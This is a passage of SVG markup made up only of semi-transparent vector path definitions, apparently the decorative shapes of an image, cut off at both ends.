d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path 